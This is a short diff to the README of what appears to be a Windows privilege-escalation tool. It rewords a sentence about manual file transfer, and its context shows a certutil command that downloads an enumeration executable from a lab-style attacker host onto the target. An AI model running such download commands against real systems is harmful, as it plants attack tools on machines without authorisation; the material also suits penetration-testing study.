atthacks/Privescker/README.md

 **The manual way**

-We all know the manual way of dumping files onto Windows is quite laborious, such as:
+We all know the manual way of dumping files onto Windows is quite laborious, especially in older versions of Windows such as:
 ```
 certutil -urlcache -f http://10.10.14.12:8000/enum.exe c:\users\public\enum.exe
 ```